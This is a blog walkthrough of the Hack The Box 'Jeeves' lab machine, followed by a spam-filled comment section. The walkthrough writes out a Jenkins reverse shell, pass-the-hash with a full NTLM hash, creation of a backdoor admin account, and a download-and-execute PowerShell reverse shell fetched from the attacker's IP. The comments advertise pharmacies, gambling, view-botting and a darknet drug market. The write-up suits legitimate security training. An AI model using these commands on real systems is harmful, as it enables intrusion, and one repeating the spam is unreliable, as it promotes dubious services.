Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
We’ll start with our basic nmap scan: nmap -p – 10.10.10.63
And then we’ll do some version discovery on those ports discovered.
Let’s start by enumerating some directories: gobuster dir -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This scan takes a while to run, but once it does we can look at the results:
And nothing. So let’s try enumarating port 50000 as well: gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
And there’s a /askjeeves directory, so let’s navigate to that webpage.
Jenkins
It looks like this version of Jenkins is running 2.87, as we can tell from the bottom right corner of the webpage. If we click around a little bit, we can see the Manage Jenkins button, and when we click on that we see an option to bring up the Script Console.
A little bit of Googling “jenkins reverse shell script” brings us to a GitHub page where someone has some example code. Perhaps we can execute this in Jenkins and get a shell back to our box?
Let’s update localhost with the IP of our Kali box, use a port we’d like, start a NetCat listener on our Kali box, and then run the script:
And we’ve got a shell!
Method 1
We’re in the C:\Users\Administrator\.jenkins directory but we can’t move back a folder:
So let’s run whoami and see if we can navigate to that user’s directory:
The user flag is in the Desktop of user kohsuke and can be viewed by typing type user.txt when you’re in that directory.
Copying Files from Target to Attacking Machine
If you dig around to the Documents directory, you’ll see a file called CEK.kdbx
We’re going to setup our Kali box as a smb server so we can transfer the Keypass file to our Kali machine and attack it. To do this we’re going to use impacket-smbserver
To use it, you type impacket-smbserver <share name> <share path>, so in our instance we’ll do impacket-smbserver Folder pwd
Then, from our Windows target machine, we’ll use some command line magic to mount that location: net use s: \\10.10.14.30\Folder
Now, on your Kali box, from within your working directory, create a folder called pwd.
Now, go back to your shell on the target/Windows machine and copy the file over: copy CEH.kdbx s: and then the file should be on your Kali box.
John the Ripper
There’s a program out there that will extract a hash from KeyPass files that then can be used in John the Ripper to attack. It’s called keepass2john and we can use it like this: keepass2john CEH.kdbx > CEHtohack
Then we can use John the Ripper to attack the hash: john CEHtohack -w:/usr/share/wordlists/rockyou.txt (note, you might have to extract the rockyou file first from its default state).
And then to view the file, we’ll need to install KeePass on our Kali box, so from terminal type: sudo apt-get install keepassx
And then open it up from the Application menu/toolbar.
Go to Database, Open Database, and find the file you transferred over. Then enter the password you recovered from John the Ripper.
The password we’re interested in here is the Backup stuff one, so let’s copy that hash. Further inspection tells us it’s a Windows NTLM hash, which can be used in the Pass the Hash attack.
Passing the Hash
We can use the Windows NTLM hash to bring up an Administrative command prompt on the target machine with the following command: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 –system //10.10.10.63 cmd.exe
When we navigate to where the root flag usually is, we’re greeted by a file called hm.txt.
Hack The Box requires that the root.txt file be stored on the Desktop, so the flag is there. We just have to figure out how to read it. Enter Alternate Data Streams.
Alternate Data Streams
More information regarding Alternate Data Streams can be found here: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
You can view potential ADS by using the /r option when looking at a Windows Directory: dir /r
The type command can’t view this data, but the more command can: so type more /? to look at the help contents for this binary in Windows.
Thus, to view the contents of the file we can type more < hm.txt:root.txt
Alternate Way
This portion is largely borrowed from this post, with parts updated for clarification as needed: https://medium.com/@OneebMalik/hack-the-box-jeeves-write-up-f1427462dc19
Let’s backup to where you utilized pth-winexe to pass the hash and log into the box.
The shell connection I had earlier was pissing me off, and I couldn’t even utilize the backspace. But what if we could establish a remote desktop connection instead? Let’s try that.
We have an administrative hash, and we’ve logged in as an admin, let’s add a user to the machine. To do this, we use the command net user /add <username> <password>
Thus, net user /add bob bobspassword
Then, we can add bob to the Administrators group with this command: net localgroup administrators bob /add
Now we start Remote Desktop on the machine: reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
Then we have to tell Windows Firewall to allow our Remote Desktop Connection through: netsh firewall set service remoteadmin enable and then netsh firewall set service remotedesktop enable
Now, from a new terminal window in Kali, type this command to remote into the Windows box: rdesktop 10.10.10.63
Log on with the account you just created. Then use File Explorer to go to the Desktop folder of the Administrator account:
To view the ADS contents, this time I launched PowerShell as an Administrator (Find it in Windows Start Menu, right click, Run as Administrator). Then navigate to that location via the prompt.
Microsoft have an interesting post regarding how to look at ADS data from Powershell: https://docs.microsoft.com/en-us/archive/blogs/askcore/alternate-data-streams-in-ntfs
First, we can check to see if it has any streams associated with it using the following command: get-item .\hm.txt -stream *
Now that we see it has data attached to it, we can read it with the following command: get-content .\hm.txt -stream root.txt
Method 2 – Potato Attack
From our shell, we can do whoami /priv to see what type of privileges we have.
We can see here we have the SeImpersonatePrivilege enabled, which means we should be able to leverage this to create a shell back to our Kali machine, taking advantage of the elevated token left on this machine. Let’s type systeminfo to see what version of Windows we’re working with.
We’ll start by creating a payload with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f exe > shell.exe
And then we’ll download JuicyPotato.exe from their GitHub page: wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Next, we’ll navigate to the Desktop of the user: C:\Users\kohsuke\Desktop
We’re going to want to transfer a couple of files to our Windows machine, so from our Kali box let’s spin up the Simple HTTP Server: python -m SimpleHTTPServer 80
I tried using certutil to copy the files over, but it’s missing from the Windows machine. So let’s try smbserver
- Next, from our Windows shell we need to connect to this SMB share we created and then copy our files over:
net use s: \10.10.14.20\smb
copy s:\shell.exe c:\users\kohsuke\Desktop\shell.exe
copy s:\JuicyPotato.exe c:\users\kohsuke\Desktop\JuicyPotato.exe
To use Juicy Potato, we need a CLSID. We can look at some of the Win 10 Pro ones here: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Pro
The first three are related to XBox Live so I’m going to skip them and try the first wuauserv one.
Annnnddddd….it didn’t work, at least not the same way from which I did Arctic. What I noticed was that my shell.exe was getting removed quite quickly from my target machine, probably by antivirus. So we’ll try a different way.
We’re going to use the Invoke-PowerShellTcp.ps1 script from Nishang to get our reverse shell. We’re going to create that malicious script, store it on our Kali box, and then have a .bat file run on our target machine that will pull the script over and execute it, all with the compromised token we get via Juicy Potato.
Start by copying Invoke-PowerShellTcp.ps1 to your working directory:
Next, open it up in Nano and add the following line to the very bottom of the script: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 4444
Next, let’s create a .bat file called shell.bat, and open it up in Nano. Add the following to it: powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.20:80/shell.ps1’)
Then stick the shell.bat into your smb folder because you’re about to copy it to your Windows machine: copy s:\shell.bat c:\users\kohsuke\Desktop\shell.bat
Now, start up Python SimpleHTTPServer so we can grab the shell.ps1 file once our script executes: python -m SimpleHTTPServer 80
Setup your NetCat listener on port 4444. And then from your Windows machine, use Juicy Potato to execute your shell.bat: JuicyPotato.exe -l 4444 -p c:\Users\kohsuke\Desktop\shell.bat -t *
And then check your new NetCat window:
This is high quality and very informative. Thank you for sharing.
6n5e2s
На данном сайте можно ознакомиться с информацией о телешоу “Однажды в сказке”, его сюжете и главных персонажах. на этом сайте/a> Здесь размещены интересные материалы о создании шоу, актерах и фактах из-за кулис.
На этом сайте вы найдёте подробную информацию о препарате Ципралекс. Вы узнаете здесь сведения о показаниях, дозировке и возможных побочных эффектах.
http://NainPoraIndia.auio.xyz/category/website/wgI2vZFhZf5rbhFqBTP7G0CD1
Промокоды — это уникальные комбинации символов, дающие скидку при покупках.
Они используются в онлайн-магазинах для получения бонусов.
https://friends.win/read-blog/12015
На этом сайте вы сможете получить действующие промокоды на товары и услуги.
Используйте их, чтобы сократить расходы на покупки.
На данном сайте можно ознакомиться с информацией о телешоу “Однажды в сказке”, его сюжете и ключевых персонажах. once upon a time смотреть онлайн Здесь представлены интересные материалы о производстве шоу, исполнителях ролей и любопытных деталях из-за кулис.
Программа видеонаблюдения – это современный инструмент для защиты имущества, сочетающий инновации и простоту управления.
На сайте вы найдете детальные инструкции по настройке и установке систем видеонаблюдения, включая облачные решения , их преимущества и ограничения .
Программное обеспечение
Рассматриваются гибридные модели , сочетающие облачное и локальное хранилище , что делает систему более гибкой и надежной .
Важной частью является описание передовых аналитических функций , таких как определение активности, идентификация элементов и дополнительные алгоритмы искусственного интеллекта.
This site, you will find details about the 1Win gambling platform in Nigeria.
It includes various aspects, including the popular online game Aviator.
1win casino online
You can also discover sports wagering opportunities.
Take advantage of an exciting gaming experience!
Макс Мара — легендарный итальянского происхождения бренд, известный на создании роскошной верхней одежды.
Основанный в 1951 году, он превратился в символ элегантности и безукоризненного кроя.
http://minimoo.eu/index.php/en/forum/suggestion-box/700122-max-mara
Знаковые пальто бренда завоевали сердца модниц по всему миру.
Inuikii — это швейцарский бренд, известный на стильной зимней обуви. Он сочетает уникальный стиль и премиальные материалы, создавая удобные модели для зимнего сезона. Бренд применяет натуральные мех и водоотталкивающие материалы, обеспечивая комфорт в любую погоду. Inuikii популярен среди городских модников, благодаря оригинальным силуэтам и практичности.
http://friedmanfilmproductions.com/__media__/js/netsoltrademark.php?d=classical-news.ru%2Finuikii-stil-teplo-i-elegantnost-v-zimney-obuvi%2F
На этом сайте представлена важная информация о лечении депрессии, в том числе у пожилых людей.
Здесь можно узнать способы диагностики и советы по улучшению состояния.
http://arct10.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Farticles%2Folanzapin-i-bar%2F
Особое внимание уделяется психологическим особенностям и их связи с эмоциональным состоянием.
Также рассматриваются эффективные медикаментозные и психологические методы лечения.
Статьи помогут лучше понять, как правильно подходить к депрессией в пожилом возрасте.
Эта компания помогает накрутить видеопросмотры и аудиторию в Twitch. С нами ваш стрим получит больше охвата и привлечет новых зрителей. Боты на Твич накрутка зрителей Мы предлагаем качественные просмотры и активных пользователей, что повысит статистику трансляции. Быстрая работа и доступные цены позволяют продвигаться без лишних затрат. Простое оформление заказа занимает всего пару минут. Начните раскрутку уже сегодня и выведите свой Twitch-канал в топ!
Центр ментального здоровья — это место, где любой может найти помощь и квалифицированную консультацию.
Специалисты помогают различными проблемами, включая повышенную тревожность, усталость и депрессивные состояния.
http://www.twlewisresales.com
В центре применяются эффективные методы лечения, направленные на улучшение внутренней гармонии.
Здесь организована безопасная атмосфера для открытого общения. Цель центра — поддержать каждого обратившегося на пути к психологическому здоровью.
Онлайн-игры на данный момент невероятно распространены. Объём игроков растёт ежегодно. Актуальные проекты открывают оригинальные возможности, из-за чего привлекают огромное количество игроков по всей планете. Сетевые чемпионаты развивается как мощную отрасль. Спонсоры инвестируют внушительные капиталы в развитие индустрии.
http://vkhacks.ru/threads/chto-vy-otnosites-po-povodu-setevyx-igr.2512/
The digital drugstore offers a broad selection of medications for budget-friendly costs.
Customers can discover various remedies suitable for different health conditions.
Our goal is to keep trusted brands at a reasonable cost.
Fast and reliable shipping provides that your purchase gets to you quickly.
Experience the convenience of getting your meds on our platform.
https://www.apsense.com/article/838692-the-pill-that-controlled-the-market-the-truth-behind-cenforce.html
Одеяние оберегает от холода и зноя, но и выражает характер. Люди выбирают наряды, чтобы выглядеть привлекательно. Для кого-то, как их воспринимают, поэтому одежда выступает способом коммуникации. Помимо этого, правильно подобранный наряд помогает в нужной обстановке. Так, строгий стиль будет уместен в офисе, а свободная одежда лучше подходят для неформальных встреч. Следовательно, стиль играет роль в каждодневных ситуациях.
https://cozwo.com/read-blog/8442
На этом сайте вы найдете учреждение психологического здоровья, которая обеспечивает психологические услуги для людей, страдающих от депрессии и других психических расстройств. Наша индивидуальный подход для восстановления психического здоровья. Наши опытные психологи готовы помочь вам решить проблемы и вернуться к гармонии. Профессионализм наших врачей подтверждена множеством положительных рекомендаций. Свяжитесь с нами уже сегодня, чтобы начать путь к восстановлению.
http://jcronincom.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fz%2Fzopiklon%2F
На этом ресурсе вы найдете учреждение психологического здоровья, которая предлагает психологические услуги для людей, страдающих от стресса и других психологических расстройств. Наша эффективные методы для восстановления психического здоровья. Врачи нашего центра готовы помочь вам преодолеть трудности и вернуться к гармонии. Опыт наших врачей подтверждена множеством положительных рекомендаций. Свяжитесь с нами уже сегодня, чтобы начать путь к оздоровлению.
http://librarypub.net/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fm%2Fmelatonin%2F
На этом ресурсе вы найдете центр психологического здоровья, которая предоставляет психологические услуги для людей, страдающих от тревоги и других ментальных расстройств. Эта эффективные методы для восстановления психического здоровья. Наши опытные психологи готовы помочь вам преодолеть проблемы и вернуться к сбалансированной жизни. Квалификация наших психологов подтверждена множеством положительных рекомендаций. Обратитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://linesofcommunication.net/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fv%2Fvenlafaksin%2F
Great wordpress blog here.. It’s hard to find quality writing like yours these days. I really appreciate people like you! take care
Hello. excellent job. I did not imagine this. This is a excellent story. Thanks!
Предлагаем услуги проката автобусов и микроавтобусов с водителем для крупных корпораций, бизнеса любого масштаба, а также частным лицам.
https://avtoaibolit-76.ru/
Обеспечиваем удобную и безопасную поездку для групп людей, предоставляя заказы на бракосочетания, деловые мероприятия, групповые экскурсии и любые события в регионе Челябинска.
В текущем году в стиле нас ждут яркие веяния. Модельеры акцентируют внимание на природные фактуры и оригинальные формы. Среди оттенков преобладают приглушенные тона, но яркие детали останутся в тренде. Популярные марки концентрируются на громоздких аксессуарах. В моде винтажные нотки и авангардный подход.
https://www.jdownloads.com/forum/index.php?topic=14660.new#new
Exquisite wristwatches have long been synonymous with precision. Crafted by renowned watchmakers, they perfectly unite heritage with modern technology.
Each detail embody unmatched workmanship, from intricate mechanisms to high-end elements.
Owning a Swiss watch is a true statement of status. It stands for refined taste and exceptional durability.
Whether you prefer a minimalist aesthetic, Swiss watches offer extraordinary reliability that never goes out of style.
http://phpbb2.00web.net/viewtopic.php?p=26051#26051
Darknet — это скрытая область онлайн-пространства, куда можно попасть исключительно через шифрованные соединения, например, I2P.
В этой среде можно найти как законные, так и нелегальные платформы, например, обменные сервисы и различные платформы.
Одной из таких торговых площадок считается BlackSprut, которая предлагала продаже различных товаров, среди которых запрещенные продукты.
bs2best at сайт
Такие сайты часто функционируют на криптовалюту для повышения анонимности транзакций.
Однако, правоохранительные органы регулярно блокируют крупные даркнет-площадки, однако на их месте появляются альтернативные ресурсы.
We offer a comprehensive collection of trusted pharmaceutical products to suit your health requirements.
This website ensures speedy and safe delivery to your location.
Each medication is sourced from trusted manufacturers for guaranteed authenticity and compliance.
Easily search through our selection and place your order hassle-free.
Need help? Customer service are here to help whenever you need.
Prioritize your well-being with our trusted online pharmacy!
https://bresdel.com/blogs/795075/Sildalis-Side-Effects-Real-Experiences-and-Management-Tips
Сертификация в нашей стране является неотъемлемым условием обеспечения безопасности товаров.
Система сертификации подтверждает соответствие нормам и официальным требованиям, что гарантирует защиту конечных пользователей от небезопасной продукции.
сертификация продукции
Кроме того, официальное подтверждение качества облегчает сотрудничество с крупными ритейлерами и открывает конкурентные преимущества для бизнеса.
Если продукция не сертифицирована, не исключены юридические риски и ограничения при продаже товаров.
Таким образом, официальное подтверждение качества является не просто обязательным, и мощным инструментом для успешного развития бизнеса в России.
Теневой интернет — это скрытая область онлайн-пространства, доступ к которой только через шифрованные соединения, такие как I2P.
В этой среде доступны законные , включая форумы и прочие сервисы.
Одной из таких платформ была Блэк Спрут, что специализировалась на реализации разных категорий.
bs2best
Эти площадки часто используют биткойны в целях конфиденциальности сделок.